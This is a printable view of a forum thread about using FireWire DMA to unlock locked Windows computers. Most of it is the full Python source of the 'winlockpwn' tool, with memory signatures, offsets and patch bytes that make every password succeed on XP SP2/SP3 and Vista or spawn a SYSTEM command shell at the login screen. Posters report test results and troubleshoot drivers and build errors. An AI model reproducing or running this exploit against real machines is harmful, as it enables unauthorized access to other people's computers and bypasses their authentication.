Printable View
williamc,
I haven't used the code yet as I don't have the equipment at home. I will try it next week when I go to the lab in the university. But I guess that it should work with the drivers I installed, if the signature and the offset are correct. I will post next week when I have some results.
Atanas
I installed those drivers and it didnt resolve the problem. Actually, it made the ipod not even register as a connection in Firewire devices! I attempted to do a system restore but it failed too.
I'm looking foward to your results!
William
I performed some tests today but had no luck. I see the ipod in the Device Manager, but if i logout and initiate winlockpwn, it starts searching for the signature, reaches the end offset and outputs an error message. Strange. If I have time tomorrow I'll test further.
Atanas
Could the folks that have captured additional (ie, non-ipod) firewire rom csr's post them here for others to test?
Also, someone posted earlier about alternative ipod drivers that worked for the attack against vista. But the link is dead. Can you describe how to find that driver?
My interest here is testing how the dma attack vector interacts with bitlocker. I'm currently decrypting a bitlockered vista system to verify Aza's (of Moonloop) patch of the vista msv1_0.dll works when patched by hand. Will post results later.
Yep, I can confirm that Aza's winlockpwn patch for vista works when manually patching msv1_0.dll. So I'm right where this thread left off before I joined in: finding a firewire driver combination that allows read-write over dma on vista.
Updated Winlockpwn to support Vista and XP SP3.
Code:#!/usr/bin/python
# Windows locked screen remote firewire unlockor
# Metlstorm 2k6
# Uh, private use only, not for public distro, kthx.
import sys
import firewire
import binascii
import time
VER=1.6
VERSTR="Winlockpwn v%s Metlstorm, 2k6. <metlstorm@storm.net.nz>" % VER
# Targets are dicts, with some properties, and one or more phases
# each phase specifies a signature which can be found at one or more
# page offsets. When a signature is found the patch is applied at patchoffset
# bytes from the beginning of the signature.
targets=[{
"name":"WinXP SP2 Fast User Switching Unlock",
"notes":"When run against a locked XPSP2 box with FUS on, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.",
"phase":[{
"sig":"8BD8F7DB1ADBFEC3",
"pageoffset":[2905],
"patch":"bb01000000eb0990",
"patchoffset":0}]
},
{"name":"WinXP SP2 Unlock",
"notes":"When run against a locked XPSP2 box with regular non-fast-user-switching, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.",
"phase":[{
"sig":"0502000010",
"pageoffset":[3696],
"patch":"b801000000",
"patchoffset":0}]
},
{"name":"WinXP SP2 msv1_0.dll technique",
"notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too! This is the best allround XPSP2 technique.",
"phase":[{
"sig":"8BFF558BEC83EC50A1",
"pageoffset":[0x927],
"patch":"B001",
"patchoffset":0xa5}]
},
{"name":"WinXP SP3 msv1_0.dll technique",
"notes":"Patches the call which decides if an account requires password authentication. Page Offset signature changed from SP2.",
"phase":[{
"sig":"8BFF558BEC83EC50A1",
"pageoffset":[0x81B],
"patch":"B001",
"patchoffset":0xa5}]
},
{"name":"Windows Vista msv1_0.dll technique",
"notes":"Patches the call which decides if an account requires password authentication. Signature and offsets changed with Vista.",
"phase":[{
"sig":"8BFF558BEC81EC88000000A1A4",
"pageoffset":[0x76A],
"patch":"B001",
"patchoffset":0xBD}]
},
{"name":"WinXP SP2 utilman cmd spawn",
"notes":"At the winlogon winstation (locked or prelogin), will spawn a system cmd shell. Start util manager with Win-U, and make sure all the disability-tools are stopped (narrator starts by default). Then run this, wait till it's patched a couple of data-phase things, then start narrator. Enjoy a shell. You can use this with the msv1_0.dll technique as well, and log in. Any time you want to get back to your shell, just lock the desktop, and you'll go back to the winlogon winstation where your shell will be waiting.",
"phase":[
{"name":"Patch code",
"sig":"535689bde8faffffff158810185b898540fbffff39bd40fbffff744e8b8524fb",
"pageoffset":[0x39f],
"patch":"565383c310899de8faffffff158810185b898540fbffff9090909090",
"patchoffset":0x0},
{"name":"Patch data",
"sig":"2f0055004d000000d420185b0539185b0000000053006f006600740077006100",
"pageoffset":[0x9ac, 0x5ac, 0x3ac],
"patch":"63006d0064002e006500780065000000570069006e0053007400610030005c00570069006e006c006f0067006f006e0000",
"patchoffset":0x0,
"keepgoing":True,
}
]
}
]
start = 0x8000000L
end = 0xffffffffL
chunk = 4096
print VERSTR
def printTargets(targets):
i = 1
print " Available Targets:"
for t in targets:
print " %2d: %s" % (i, t["name"])
i+=1
print "\nTarget Notes:\n"
for t in targets:
print "%s:\n---------------\n%s\n" % (t["name"], t["notes"])
def usage():
print "Usage: winlockpwn port node target [start-end]"
print " - Port and node are the firewire port and node numbers. Use businfo to identify your targets port and node numbers."
print " - Target should be one of the numbered targets listed below."
print " - You can optionally supply a start-end memory range to search for signatures in, useful if you're restarting, or want to limit the upper end of memory (which will otherwise walk up to 4GB without stopping). This understands anything sensible; eg 0-100M, 0xffff-0x1ffff, 1m-, 200k-1GB, -0xffff."
print "(Remember that you'll need to use CSR trickery with romtool to talk DMA to windows.)\n"
printTargets(targets)
sys.exit(1)
if len(sys.argv) < 4:
usage()
try:
port = int(sys.argv[1])
node = int(sys.argv[2])
targetno = int(sys.argv[3])
if len(sys.argv) > 4:
start,end = firewire.parseRange(sys.argv[4])
if end == None:
end = 0xffffffffL
except ValueError:
usage()
if targetno < 1 or targetno > len(targets):
usage()
target = targets[targetno -1]
print "Target Selection:"
print " Name : %s" % target["name"]
print " Notes : %s" % target["notes"]
for p in target["phase"]:
if p.has_key("name"):
print "Phase: %s" % p["name"]
print " Pattern: 0x%s" % p["sig"]
print " Offset : %s" % p["pageoffset"]
print " Patch : 0x%s" % p["patch"]
print " Offset : %d" % p["patchoffset"]
print "Scanning Options:"
print " Start : 0x%x" % start
print " Stop : 0x%x" % end
print " Pagesz : %d" % chunk
for so in p["pageoffset"]:
if len(p["sig"]) + so > chunk:
print "Uh oh, signature crosses page boundary. This isn't supported :("
sys.exit(1)
if so + p["patchoffset"] > chunk:
print "Uh oh, patch offset crosses page boundary. This isn't supported :("
sys.exix(1)
print "Init firwire, port %d node %d" % (port, node)
h = firewire.Host()
n = h[port][node]
print "Snarfin' memories..."
sys.stdout.flush()
dumppage = False
won = False
startt = time.time()
last = 0
for p in target["phase"]:
try:
print "Phase: %s" % p["name"]
except KeyError:
pass
signatureoffset=p["pageoffset"]
eviloffset = p["patchoffset"]
payload = binascii.unhexlify(p["patch"])
pattern = binascii.unhexlify(p["sig"])
eviladdr = None
for offset in range(start, end, chunk):
now = time.time()
if now > (last + 1):
last = now
print "\rChecking for signature on page at 0x%08x (%dkB) at %d kB/s..." % (offset, offset / 1024, (offset - start) / (now - startt) / 1024 ),
sys.stdout.flush()
for so in signatureoffset:
mem = n.read(offset + so , len(pattern))
if mem == pattern:
print "Found signature at 0x%08x" % (offset + so)
eviladdr = offset + so + p["patchoffset"]
if dumppage:
fo = open("winlockpwn.dumppage.0x%08x" % offset, "w")
fo.write(n.read(offset, chunk))
fo.close()
break
if eviladdr != None:
won = True
print "Setting up teh bomb...",
n.write(eviladdr, payload)
print "Donezor!"
verify=n.read(eviladdr, len(payload))
print "Verified evil: 0x%s" % (binascii.hexlify(verify))
if dumppage:
fo = open("winlockpwn.dumppage.0x%08x.patched" % offset, "w")
fo.write(n.read(offset, chunk))
fo.close()
if p.has_key("keepgoing") and p["keepgoing"]:
eviladdr = None
else:
break
if won:
print "You may proceed with your nefarious plans"
else:
print "\nOh noes, you didn't win"
endt = time.time()
print "Elapsed time %d seconds" % (endt - startt)
Thankyou for the guide - however summits gone wrong. :o [with me this is normal]
The error i get is :
bt ~ # cd pythonraw1394
bt pythonraw1394 # make
swig -shadow -python -I/usr/local/include/libraw1394 raw1394.i
/usr/local/include/libraw1394/raw1394.h:1244: Error: Syntax error in input(1).
make: *** [raw1394.py] Error 1
bt pythonraw1394 #
My MakeFile is :Have i borked it completly?Code:
.PHONY=all clean dist
all: raw1394.py _raw1394.so
_raw1394.so: raw1394_wrap.c /usr/local/include/python2.3
$(CC) -Wall -shared -fPIC -I/usr/local/include/python2.3 -I/usr/include/libraw1394 raw1394_wrap.c -$
raw1394_wrap.c: raw1394.py
raw1394.py: raw1394.i
swig -shadow -python -I/usr/local/include/libraw1394 raw1394.i
clean:
-rm raw1394.py
-rm raw1394.pyc
-rm _raw1394.so
-rm raw1394_wrap.c
-rm pythonraw1394.tar.gz
dist: clean
tar czf pythonraw1394.tar.gz -C.. --exclude=\.\* pythonraw1394/Makefile pythonraw1394/README pythonr$
Thanks in Advance
Hmm, not sure what your doing wrong. I notice your using Python 2.3. Have you tried following the instructions on the first page with the 2.5 method? Let us know.
William
Tested on WindowsXPSP2,SP3 and works fine just got a problem with Vista once start surf the memory just after a few sec will detect the error resource busy .. as previuos posted.
Been tested also with the Network login with XPSP2 and worked great !
ok i crossed that hurdle :p
now i am at the point where i have to reference /usr/local/include/python2.5 in the other scripts - but i cant see any obvious places to put the reference into :o
Its getting late so i will have another look again tomorrow :D thankyou for the 2.5 pointer :p
Vista will work for a few seconds, at which point you will get a resource busy error. As I previously requested, if anyone has a firewire device other than an Ipod, please use romtool to create a csr file.
William